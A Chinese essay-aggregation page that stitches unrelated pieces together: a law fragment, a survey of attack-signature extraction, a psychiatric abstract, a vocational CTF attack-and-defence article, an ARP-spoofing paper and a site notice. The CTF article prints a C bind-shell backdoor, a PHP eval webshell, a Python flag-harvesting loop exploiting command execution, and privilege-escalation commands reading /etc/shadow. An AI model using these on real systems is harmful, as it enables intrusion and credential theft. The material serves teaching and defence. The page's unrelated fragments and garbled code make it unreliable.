义的结论所证实,侵略并不以国家的军队发动武装攻击为必要条件,比如非法延伸军队的驻扎区,或允许国家的领土被他国使用以进攻第三国。[3](P854)即便如此,在这种情况下,美军这种拟用现实武力应对网络武力攻击的做法仍然也要受必要性原则和相称性原则的限制。

五、在安全理事会采取必要办法,以维持国际和平及安全以前

攻击范文篇6

攻击特征自动提取分为攻击发现和提取特征两个基本步骤。因此,与入侵检测系统可以分为网络IDS(NIDS)和主机IDS(HIDS)类似,根据发现攻击的位置不同,攻击特征自动提取也可以分为基于网络和基于主机的两大类,分别简记为NSG(network-basedsignaturesgeneration)和HSG(host-basedsignaturesgeneration)。1)NSG主要是通过分析网络上的可疑数据来提取字符型的特征。字符型的特征是指通过字符串(二进制串)的组成、分布或频率来描述攻击。NSG系统一般通过数据流分类器或Honeypot系统来发现网络数据中可疑的攻击行为,并获得可能包括了攻击样本的可疑网络数据;然后将其分成两个部分,一部分NSG系统[8~9]对这些可疑数据进行聚类,使得来自同一攻击的数据聚为一类,再对每一类提取出攻击特征,另一部分NSG系统则没有聚类过程,而是直接分析混合了多个攻击样本的数据,提取可以检测多个攻击的特征。最终NSG系统将提取出的攻击特征转化为检测规则,应用于IDS系统的检测。2)HSG主要是指检测主机的异常并利用在主机上采集的信息来提取攻击特征。根据获得主机信息的多少,HSG又可以进一步分为白盒HSG方法、灰盒HSG方法和黑盒HSG方法三类。白盒HSG方法需要程序源代码,通过监视程序执行发现攻击行为的发生,进而对照源程序提取出攻击特征;灰盒HSG方法不需要程序源代码,但是必须密切地监视程序的执行情况,当发现攻击后通过对进程上下文现场的分析提取攻击特征;黑盒HSG方法最近才提出,它既不需要程序源代码也不需要监视程序的执行,而是通过自己产生的“测试攻击数据”对程序进行攻击,如果攻击成功,表明“测试数据”有效,并以该“测试数据”提取出攻击的特征。

基于网络的攻击特征自动提取技术

下面介绍几种NSG方法。基于最长公共子串方法早期的NSG系统[10~11]大多采用提取“最长公共子串”(LCS)的方法,即在可疑数据流中查找最长的公共子字符串。虽然基于后缀树计算两个序列的LCS可在线性时间内完成[12],但是LCS方法仅仅提取单个最长的特征片段,并不足以准确描述攻击。基于固定长度负载出现频率方法Autograph[13]按照不同的方法将可疑数据流划分为固定长度的分片,然后基于Rabinfingerprints算法[14]计算分片在所有可疑数据流中出现的频繁度,最后将频繁度高的分片输出为攻击特征。该方法存在的问题是难以选取固定长度的大小、计算开销和存储开销大、没有考虑攻击变形情况。YongTang等人将可疑数据流中含有多个特征片段的固定长度部分定义为“关键区域”,并利用Expectation-Maximization(EM)[15]和GibbsSampling[16]这两种迭代计算算法查找关键区域。但是“关键区域"长度选取困难、算法不能确保收敛限制了该方法的有效性。基于可变长度负载出现频率基于可变长度负载出现频率的方法是当前比较有效的特征提取方法,由Newsome等人在本世纪初Polygraph[17]的研究中首次提出。可变长度负载出现频率是指长度大于1的在可疑数据流中频繁出现的字符串,可变长度负载出现频率长度不固定,每一个可变长度负载出现频率可能对应于攻击中的一个特征片段。因此,基于可变长度负载出现频率的方法的核心是提取出数据流中频繁度大于一定阀值的所有可变长度负载出现频率,一般都采用遍历前缀树的算法[18~19]。以可变长度负载出现频率为核心,Poly-graph输出三类攻击特征:1)可变长度负载出现频率组成的集合,称为ConjunctionSignature;2)可变长度负载出现频率组成的序列,称为Token-subsequenceSignature;3)可变长度负载出现频率附加贝叶斯概率值,称为BayesSigna-ture。Polygraph在设计时考虑了攻击变形的情况,并且首次引入聚类过程,因此大大提高了提取特征的准确性。基于有限状态自动机Vinod等人提出的有限状态自动机[20]首先对可疑数据流进行聚类,然后对每一类中的数据流应用sk-strings[21]算法生成一个有限状态自动机,最后将有限状态自动机转化为攻击特征。有限状态自动机的主要创新是在特征提取过程中考虑了网络协议的语义,因而可以在网络层和会话层分别提取特征。然而因为需要协议的语义,所以有限状态自动机只对特定的几种协议有效,而通用性较差。

基于主机的特征自动提取技术

HSG的研究也是目前研究比较多的技术,经过几年的发展也取得了很好的进展,产生了一些重要的研究成果。下面针对三类方法分别进行介绍。白盒方法因为需要程序源代码,适用性较差,所以基于白盒方法的HSG系统较少。一种典型的技术是指令集随机化(ISR)技术[22],这种技术主要原理是可以将程序的二进制代码随机打乱,使得攻击者实施缓冲区攻击后极有可能导致程序崩溃并产生异常。指令集随机化技术是一种新型的保护系统免遭任何类型注入码攻击的通用方法。对系统指令集经过特殊的随机处理,就可以在该系统上运行具有潜在漏洞的软件。任何注入代码攻击成功利用的前提是攻击者了解并熟悉被攻击系统的语言,如果攻击者对这种语言无法理解则很难进行攻击,攻击者在不知道随机化算法密钥的情况下,注入的指令是无法正确执行的。FLIPS[23]是一个基于ISR技术构建的HSG系统,当攻击导致程序崩溃后,FLIPS对于此相关的网络输入数据用LCS算法提取出攻击片段由于ISR技术要求具有程序的源代码,所以FLIP是一种白盒方法。白盒方法需要了解源程序代码,这在很多场是不可能的事情,因此需要一种不需要了解源程序代码的方法,这种情况下黑盒方法面世。HACQIT[24]是最早的一个黑盒方法。当受保护程序发生意外崩溃后,通过将可疑的网络请求重新发往该程序并判断是否再次导致程序崩溃,HAC-QIT检测出那些被称为“bad-request”的请求。然而,HACQIT没有进一步区分“bad-request”中哪些部分才是真正的攻击特征。因为一个进程的虚拟地址空间范围是有限的,缓冲区溢出攻击成功后必然立刻执行一个跳转指令,而该跳转指令的目标地址一定位于虚拟地址空间范围内。如果将该跳转目标地址改变,将很可能造成攻击的溢出失败并导致程序崩溃。WANGX等基于这样的思想提出了一个黑盒HSG系统PacketVaccine[25]:将可疑报文中那些类似跳转目标地址(其值属于虚拟地址空间范围内)的字节进行随机改变,构造出新报文,称为“报文疫苗”(packvaccine),然后将“报文疫苗”输入给受保护程序如果程序崩溃,则说明之前改变的字节就是攻击溢出后的跳转地址,可以作为攻击特征。随着现代技术的不断推进,黑盒方面和白盒方法都只能应用于特征提取中的一些环节,一种新兴技术介于两种技术之间,而且还可以得到很好的应用,因此,灰盒技术应运而生。灰盒方法是指通过紧密跟踪程序的执行从而发现攻击并提取特征。因为灰盒方法并不需要程序的源代码,所以适用于各种商业软件。其分析的结果也比较准确,目前大多数HSG系统属于这类方法。灰盒方法有以下几种具体实现方式。1)基于动态数据流跟踪TaintCheck[26]和Vigilante[27]都使用动态数据流跟踪(taintanalysis)来检测缓冲区溢出攻击。其基本思想是:认为来自网络上的数据是不可信的,因此跟踪它们在内存中的传播(称为“污染”)情况如果函数指针或返回地址等被“受污染”的数据所覆盖,则说明发生了攻击;此后,从该“受污染”的数据开始,反向查询“污染”的传播过程,直到定位到作为“污染源”的具体的网络输入。不同的是TaintCheck选取3byte,而Vigilante选取偏移量作为输出特征。2)基于地址空间随机化(ASR)技术[28~29]是将进程的一些地址(如跳转地址、函数返回地址、指针变量地址等)随机化,使得攻击者难以知道溢出目标的准确位置。使用ASR技术后,攻击者将难以对程序成功实施缓冲区溢出攻击,而溢出失败后会导致程序崩溃及产生异常。与ISR技术相比,ASR技术的优点是不需要源代码。

攻击特征自动提取综合技术

一种基于概率有效状态自动机的攻击特征自动提取技术,是根据概率有限状态自动机学习算法PFSA(Probabi-listicFiniteStateAutomaton)对聚类形成的类簇归纳处理(ClusterGeneralization),转化为可被有限状态自动机所识别的正则语言,并提取特征。有限状态自动机系统[30]包括数据提取组件(DataAbstractionComponent,DAC)和特征提取组件(SignatureGenerationComponent,SGC)两个部分。数据提取组件通过一系列模块对数据进行预处理和规范化,以适于聚类和特征提取,最终形成半结构化会话树(SSTs)。DAC组件将SSTs编码后形成的XML输出到特征提取组件。SGC组件对规范化后的数据利用星聚类对连接和会话进行聚类,其中相似性度量采用余弦相似度方式,然后利用PFSA算法对聚类形成的类簇归纳处理,形成能被有限状态自动机所识别的正则语言,即特征。的特征提取方法该方法是根据COPP算法对数据流进行动态切割,然后采用统计方法提取出攻击特征。Autograph系统[31]的特征提取主要分为两个过程。首先,使用COPP算法对通过启发式方法找到的可疑数据流量进行数据分割,方法是先定义暂停标记,然后以滑动窗口的概念去比对,每次遇到暂停标记时就分割。其次,使用统计的方法找出出现最频繁的数据包作为攻击特征,计算分割完毕的各个数据包的出现次数,如果一个数据包的出现次数超过一定门限值,则产生特征。该方法的数据流划分是根据递推比较模式串与正文子串的哈希函数值来进行攻击特征提取。RabinFingerprints算法定义一个哈希函数,并用该函数对模式串与正文子串进行预处理,然后以被比较的模式串与正文子串的哈希函数值相等为原则,依次进行比较。算法可以利用前一个哈希函数值递推求出下一个哈希函数值,以降低字符串匹配算法的时间复杂度和空间复杂度。文献[32]首次应用Rabinfingerprints算法于攻击特征自动提取。该方法通过比较两个主要的攻击行为特征—由感染源得到的公共序列和目的地址,识别出新型攻击,然后使用内容过滤算法自动生成攻击特征。该方法是通过寻找最长的公共子字符串来进行攻击特征提取。LCS算法要解决的问题就是找到两个字符串中的最大公共子串和最大公共子串所在的位置。文献[33]提出一种基于两序列LCS算法提取攻击特征的方法,在重组来自入侵检测系统的数据后,用LCS算法两两比对寻找最长的公共子字符串,以此来确认攻击特征。基于Honeypot数据[34~39]的Honeycomb系统,首先重组所有来自Honeypot的数据,然后在这些数据中,采用LCS算法两两匹配,寻找最长的公共子字符串,从而找出攻击特征。

存在问题及研究方向

攻击范文篇7

背景:本研究寻求评估精神科门诊患者愤怒和攻击的水平,并确定愤怒是否象抑郁和焦虑一样,是这些患者突出的一种情感状态。我们也寻求确定哪一种轴Ⅰ和轴Ⅱ障碍与主观愤怒和攻击行为的增加有关。

方法:对1300例精神科门诊患者进行半定式访谈,评估目前DSM-Ⅳ轴Ⅰ(N=1300)和轴Ⅱ障碍(N=687)。评估最近一周内每一个患者的愤怒和攻击水平,计算每一种障碍的比数比(Oddsratios)。采用多元回归分析确定哪一种精神障碍是患者愤怒和攻击行为的独立影响因素。

结果:大约一半的样本报告目前有中度至重度的愤怒,大约四分之一在最近一周内有攻击行为。愤怒的水平与患者报告的抑郁心境和精神焦虑的水平相当。重性抑郁障碍、双相Ⅰ型障碍、间歇性冲动障碍和B族人格障碍是愤怒和攻击的独立影响因素。“公务员之家有”版权所

结论:精神科门诊患者有突出的愤怒和攻击,其水平与抑郁和焦虑相当;这样,常规检查这些症状对于临床医生来说就很重要。

攻击范文篇8

关键词:高职;网络攻防

目前各级各类的网络攻防竞赛正在高职院校间如火如荼地开展,在攻防竞赛中所有参赛队伍都被分配若干靶机,这些靶机都存在着漏洞,在规定时间内参赛队伍要尽力加固自己的靶机,并利用漏洞攻击对方靶机以获得flag(flag是靶机root目录下flagvalue.txt文件的内容),具有很强的对抗性。通过参与网络对攻竞赛,学生的网络技术水平得到了提高,网络安全意识得到了培养,也为今后成为一名合格的“网络强国”技能人才打下良好的基础。目前高职网络攻防竞赛中网络靶机的漏洞大致分为3类:弱口令、后门、Web漏洞。

1弱口令攻击

1.1弱口令攻击的表现

高职攻防竞赛中弱口令攻击是最为常见和直接的攻击形式,靶机系统一般开放SSH、Telnet、VNC等远程登录服务,攻防中利用已知的用户名和破解出的口令便能渗透进对方系统。实际对战中爆破口令的方式有多种,如利用渗透机kali中的相关工具hydra、medusa、sparta、msf等;利用Python脚本进行口令爆破,破解SSH登录口令代码如下:此外,由于攻防时间有限,人工猜测口令也较为常见,如123456、root、admin等。当利用已知的用户和猜测的口令进入靶机系统后,往往需要对用户进行提权才能查看root目录下的flag值,常见的提取方式如sudo提权即给定的用户如ad-min,在/etc/sudoers文件中已经写入了adminALL=(ALL:ALL)ALL,此时用户admin执行root指令时,只需在执行的指令前加入sudo即可;find提权即利用find文件拥有的suid权限,普通用户执行指令如find/usr/bin/find-execcat/etc/shadow,即可看到只有root用户才能看到的shadow文件;脏牛提权,Linux靶机往往存在着系统内核漏洞如2.6.22到3.9之间的Linux,利用脏牛exp就能在该系统生成一个后门用户fireflat(权限与root一致),密码可自定;隐藏用户提权,/etc/pass-wd、/etc/shadow是两个Linux存放用户名、密码的文件,如果给定用户有权限查看这两个文件,便可以利用工具如ophcrack、john等破解root口令或隐藏用户的口令,隐藏用户往往具有root一样的权限。

1.2弱口令攻击的防范

弱口令攻击的防范一般有两种思路:(1)从口令本身入手即修改原有用户的口令,使其符合一定的复杂度(数字+大小写字母+特殊符号),同时修改用户文件,删除隐藏用户,如使用awk-F:'($3==0){print$1}'/etc/passwd删除root之外的uid为0的用户;(2)从服务配置入手,如对SSH、Telnet、VNC进行登录限制,如在/etc/ssh/sshd_config文件中将PermitRootLogin改成no,使得root用户不能通过ssh服务登录系统;在/etc/xinetd.d/telnet文件中设置对telnet用户限制IP地址等。

2后门端口

2.1后门端口攻击的表现

高职攻防竞赛中靶机后门往往比较常见,靶机后门会开启一个端口,这个端口一般为高端口(高于1024)或伪装成一个正常端口,如木马程序:intmain(){serv_addr.sin_family=2;serv_addr.sin_ad-dr.s_addr=0;serv_addr.sin_port=0x901F;sock=sock-et(2,1,0);bind(sock,(structsockaddr*)&serv_addr,0x10);listen(sock,1);dup2(cli,0);dup2(cli,1);dup2(cli,2);execve("/bin/sh",0,0);}该程序在运行时开放了一个8080的后门端口,攻击机只需利用NC工具连入这个后门8080端口就能轻松进入靶机系统。一些知名的靶机也存在着后门端口,如Metasplotable2-linux后门端口为1524,有着永恒之蓝漏洞的Windows系统后门端口为445等。

2.2后门端口攻击的防范

对于后门端口的防范一般分为两个步骤:第1步是扫描,即利用扫描工具如Nmap、Zenmap、OpenVas等对靶机系统进行扫描,查询可疑端口如图1所示,端口对应的version下可以看到明显的后门描述和可疑信息。第2步,利用防火墙对端口进行过滤,如只允许基本服务被访问指令如下:iptables-AINPUT-s172.19.3.0/24-jACCEPT允许特殊网段的连接iptables-AINPUT-picmp-jACCEPT允许ping命令执行iptables-AINPUT-ptcp--dport80-jACCEPT允许http端口iptables-AINPUT-ptcp--dport21-jACCEPT允许ftp端口iptables-AINPUT-ptcp--dport22-jACCEPT允许ssh端口iptables-AINPUT-ptcp--dport23-jACCEPT允许telnet端口iptables-AINPUT-jDROP拒绝所有的端口访问此外,在防范后门攻击时还要注重查询靶机的可疑进程,如图2所示,利用kill9pid结束进程,或利用pkill批量结束类似名称的进程。

3Web攻击

3.1Web攻击的表现

高职网络攻防竞赛中,Web攻击是一种重要的攻击手段。网络靶机一般自带cms(内容管理系统),攻击者可以利用cms存在的Web漏洞进行攻击,常见的cms漏洞网站如dedecms、escms、seacms等,此外一些知名的渗透网站如DVWA、bwapp、bikachu也会被在网络靶机中,这些网站有着目录遍历、命令执行、文件包含、SQL注入、跨站脚本漏洞等多种漏洞,在进行网络攻击时可以编写Python脚本代码如下(网站的命令执行漏洞),进行批量攻击如图3所示。importrequests,#导入requests第三方库,该模块#存放着和网页访问有关的方法foriinrange(100,110):#对攻击的网段进行遍历,网#段的取值根据实际情况而定try:#利用try进行程序的尝试ip='10.18.'+str(i)+'.249'#构造攻击靶机的IP#地址,其中靶机IP有3位是固定的html=requests.get("#构造网页访问链接/root/flagvalue.txt",timeout=0.1).text#将网页访问命#令执行的结果赋给变量htmlprint'WebShell:'+ip,'flag'+html#将访问的#IP地址和flag打印输出exceptException:pass#如果无法访问网页则跳过。

3.2Web攻击的防范

对于Web攻击的防范一般分两个部分:代码审计和修改配置文件。代码审计是对网站的源代码进行人工或自动化的审计,找出网页中存在的危险代码,如网站内部存在着<?phpeval($_POST[aa])?>这是典型的php木马程序;<?php$page=$_GET[’page’];include($page);?>这是典型的文件包含漏洞程序;<?phpsystem这是典型的命令执行漏洞程序,代码审计也常利用的自动化工具有SEAY、RIPS、VCG等,通过审计对存在的漏洞可采用注释或删除的方式进行加固,实战中由于cms系统涉及文件较多,修改网页的配置文件显然是防范Web攻击的重要手段,如修改php配置文件如下:safe_mode=on//开启安全函数safe_mod_inclue_dir=/var/www/html//安全模式下包//含文件open_basedir=/var/www/html//php脚本能访问的目录disable_funcations=exec()system()shell_exe()eval()//禁止危险函数file_uploads=off//禁止上传也可以修改网站对应的数据库配置文件如下:mysql-uroot-ppassword:root进入mysql数据库selectuser,host,passwordfrommysql.user;查看mysql的登录密码);修改mysql数据库密码5结语介绍了3类典型的高职网络攻防竞赛的攻击手段和防范策略,实际对战中也有利用靶机系统级漏洞进行攻击的如Windows中常见的ms08067、ms17010、cve-2017-7269、cve2019-0708等,Linux中常见的vsftp2.3.4、sm-bcry漏洞、dirtycow等。由于技术的进步,靶机系统的漏洞也在“与时俱进”,这就需要今后不断努力去搜集、去发现。

参考文献

[1]李馥娟,王群.网络靶场及其关键技术研究[J].计算机工程与应用,2022,(05):12-22.

[2]马晓亮.网络安全攻防实战技术与效果分析[J].信息安全研究,2021,7(08):763-772.

攻击范文篇9

关健词ARP协议ARP欺骗MAC地址IP地址网络安全

1ARP协议简介

ARP(AddressResolutionProtocol)即地址解析协议,该协议将网络层的IP地址转换为数据链路层地址。TCPIP协议中规定,IP地址为32位,由网络号和网络内的主机号构成,每一台接入局域网或者Internet的主机都要配置一个IP地址。在以太网中,源主机和目的主机通信时,源主机不仅要知道目的主机的IP地址,还要知道目的主机的数据链路层地址,即网卡的MAC地址,同时规定MAC地址为48位。ARP协议所做的工作就是查询目的主机的IP地址所对应的MAC地址,并实现双方通信。

2ARP协议的工作原理

源主机在传输数据前,首先要对初始数据进行封装,在该过程中会把目的主机的IP地址和MAC地址封装进去。在通信的最初阶段,我们能够知道目的主机的IP地址,而MAC地址却是未知的。这时如果目的主机和源主机在同一个网段内,源主机会以第二层广播的方式发送ARP请求报文。ARP请求报文中含有源主机的IP地址和MAC地址,以及目的主机的IP地址。当该报文通过广播方式到达目的主机时,目的主机会响应该请求,并返回ARP响应报文,从而源主机可以获取目的主机的MAC地址,同样目的主机也能够获得源主机的MAC地址。如果目的主机和源主机地址不在同一个网段内,源主机发出的IP数据包会送到交换机的默认网关,而默认网关的MAC地址同样可以通过ARP协议获取。经过ARP协议解析IP地址之后,主机会在缓存中保存IP地址和MAC地址的映射条目,此后再进行数据交换时只要从缓存中读取映射条目即可。ARP协议工作原理详见图1和图2。

3ARP欺骗攻击的实现过程

3.1网段内的ARP欺骗攻击

ARP欺骗攻击的核心就是向目标主机发送伪造的ARP应答,并使目标主机接收应答中伪造的IP与MAC间的映射对,并以此更新目标主机缓存。设在同一网段的三台主机分别为A,B,C,详见表1。

表1:同网段主机IP地址和MAC地址对应表

用户主机IP地址MAC地址

A10.10.100.100-E0-4C-11-11-11

B10.10.100.200-E0-4C-22-22-22

C10.10.100.300-E0-4C-33-33-33

假设A与B是信任关系,A欲向B发送数据包。攻击方C通过前期准备,可以发现B的漏洞,使B暂时无法工作,然后C发送包含自己MAC地址的ARP应答给A。由于大多数的操作系统在接收到ARP应答后会及时更新ARP缓存,而不考虑是否发出过真实的ARP请求,所以A接收到应答后,就更新它的ARP缓存,建立新的IP和MAC地址映射对,即B的IP地址10.10.100.2对应了C的MAC地址00-E0-4C-33-33-33。这样,导致A就将发往B的数据包发向了C,但A和B却对此全然不知,因此C就实现对A和B的监听。

3.2跨网段的ARP欺骗攻击

跨网段的ARP欺骗比同一网段的ARP欺骗要复杂得多,它需要把ARP欺骗与ICMP重定向攻击结合在一起。假设A和B在同一网段,C在另一网段,详见表2。

表2:跨网段主机IP地址和MAC地址对应表

用户主机IP地址MAC地址

A10.10.100.100-E0-4C-11-11-11

B10.10.100.200-E0-4C-22-22-22

C10.10.200.300-E0-4C-33-33-33

首先攻击方C修改IP包的生存时间,将其延长,以便做充足的广播。然后和上面提到的一样,寻找主机B的漏洞,攻击此漏洞,使主机B暂时无法工作。此后,攻击方C发送IP地址为B的IP地址10.10.100.2,MAC地址为C的MAC地址00-E0-4C-33-33-33的ARP应答给A。A接收到应答后,更新其

ARP缓存。这样,在主机A上B的IP地址就对应C的MAC地址。但是,A在发数据包给B时,仍然会在局域网内寻找10.10.100.2的MAC地址,不会把包发给路由器,这时就需要进行ICMP重定向,告诉主机A到10.10.100.2的最短路径不是局域网,而是路由,请主机重定向路由路径,把所有到10.10.100.2的包发给路由器。主机A在接受到这个合理的ICMP重定向后,修改自己的路由路径,把对10.10.100.2的数据包都发给路由器。这样攻击方C就能得到来自内部网段的数据包。

4ARP欺骗攻击安全防范策略

4.1用户端绑定

在用户端计算机上绑定交换机网关的IP和MAC地址。

1)首先,要求用户获得交换机网关的IP地址和MAC地址,用户在DOS提示符下执行arp–a命令,具体如下:

C:\DocumentsandSettings\user>arp-a

Interface:10.10.100.1---0x2

InternetAddressPhysicalAddressType

10.10.100.25400-40-66-77-88-d7dynamic

其中10.10.100.254和00-30-6d-bc-9c-d7分别为网关的IP地址和MAC地址,因用户所在的区域、楼体和交换机不同,其对应网关的IP地址和MAC地址也不相同。

2)编写一个批处理文件arp.bat,实现将交换机网关的MAC地址和网关的IP地址的绑定,内容如下:

@echooff

arp-d

arp-s10.10.100.25400-40-66-77-88-d7

用户应该按照第一步中查找到的交换机网关的IP地址和MAC地址,填入arp–s后面即可,同时需要将这个批处理软件拖到“windows--开始--程序--启动”中,以便用户每次开机后计算机自动加载并执行该批处理文件,对用户起到一个很好的保护作用。

4.2网管交换机端绑定

在核心交换机上绑定用户主机的IP地址和网卡的MAC地址,同时在边缘交换机上将用户计算机网卡的MAC地址和交换机端口绑定的双重安全绑定方式。

1)IP和MAC地址的绑定。在核心交换机上将所有局域网络用户的IP地址与其网卡MAC地址一一对应进行全部绑定。这样可以极大程度上避免非法用户使用ARP欺骗或盗用合法用户的IP地址进行流量的盗取。具体实现方法如下(以AVAYA三层交换机为例):

P580(Configure)#arp10.10.100.100:E0:4C:11:11:11

P580(Configure)#arp10.10.100.200:E0:4C:22:22:22

P580(Configure)#arp10.10.200.300:E0:4C:33:33:33

2)MAC地址与交换机端口的绑定。根据局域网络用户所在的区域、楼体和用户房间所对应的交换机端口号,将用户计算机网卡的MAC地址和交换机端口绑定。此方案可以防止非法用户随意接入网络端口上网。网络用户如果擅自改动本机网卡的MAC地址,该机器的网络访问将因其MAC地址被交换机认定为非法而无法实现上网,自然也就不会对局域网造成干扰了。具体操作如下(以AVAYA二层边缘交换机为例):

console>(enable)lockport1/1

console>(enable)addmac00:E0:4C:11:11:111

Address00:E0:4C:11:11:11wasaddedtothesecurelist!

console>(enable)lockport1/2

console>(enable)addmac00:E0:4C:22:22:222

Address00:E0:4C:22:22:22wasaddedtothesecurelist!

console>(enable)lockport1/3

console>(enable)addmac00:E0:4C:33:33:333

Address00:E0:4C:33:33:33wasaddedtothesecurelist!

console>(enable)showcam

VLANDestMAC/RouteDesDestinationPort

100:E0:4C:11:11:111/1

100:E0:4C:22:22:221/2

100:E0:4C:33:33:331/3

4.3采用VLAN技术隔离端口

局域网的网络管理员可根据本单位网络的拓卜结构,具体规划出若干个VLAN,当管理员发现有非法用户在恶意利用ARP欺骗攻击网络,或因合法用户受病毒ARP病毒感染而影响网络时,网络管理员可利用技术手段首先查找到该用户所在的交换机端口,然后将该端口划一个单独的VLAN将该用户与其它用户进行物理隔离,以避免对其它用户的影响。当然也可以利用将交换机端口Disable掉来屏蔽该用户对网络造成影响,从而达到安全防范的目的。

5结束语

网络欺骗攻击作为一种非常专业化的攻击手段,给网络安全管理者带来了严峻的考验。ARP欺骗是一种典型的欺骗攻击类型,它利用了ARP协议存在的安全隐患,并使用一些专门的攻击工具,使得这种攻击变得普及并有较高的成功率。文中通过分析ARP协议的工作原理,探讨了ARP协议从IP地址到MAC地址解析过程中的安全性,给出了网段内和跨网段ARP欺骗的实现过程,提出了几种常规可行的解决方案,如在用户计算机上绑定交换机网关的IP地址和MAC地址、在交换机上绑定用户主机的IP地址和网卡的MAC地址或绑定用户计算机网卡的MAC地址和交换机端口、VLAN隔离等技术。如果多种方案配合使用,就可以最大限度的杜绝ARP欺骗攻击的出现。总之,对于ARP欺骗的网络攻击,不仅需要用户自身做好防范工作之外,更需要网络管理员应该时刻保持高度警惕,并不断跟踪防范欺骗类攻击的最新技术,做到防范于未然。

参考文献

[1]邓清华,陈松乔.ARP欺骗攻击及其防范[J].微机发展,2004,14(8):126-128.

[2]孟晓明.基于ARP的网络欺骗的检测与防范[J].信息技术,2005,(5):41-44.

[3]徐功文,陈曙,时研会.ARP协议攻击原理及其防范措施[J].网络与信息安全,2005,(1):4-6.

攻击范文篇10

亲爱的朋友们。由于我们一直致力于免费网站。其中有一部份收费网站视本站为眼中钉,手中刺,千方百计的搞破坏。

并于29号晚10时发动对我站的攻击,虽然我们及时进行了有效的反抗,但在28号和29号的约有1000名注册用户的数据还是在这次攻击中丢失。在此,我对我们忠实的朋友表示深深的歉意,并希望能够得到你们理解、支持、和鼓励。

如果不嫌弃我们的话,请再花30秒注册。

我们承诺:[公务员之家]会一如继往的用心为大家服务!

小陈老师写于凌晨1点48分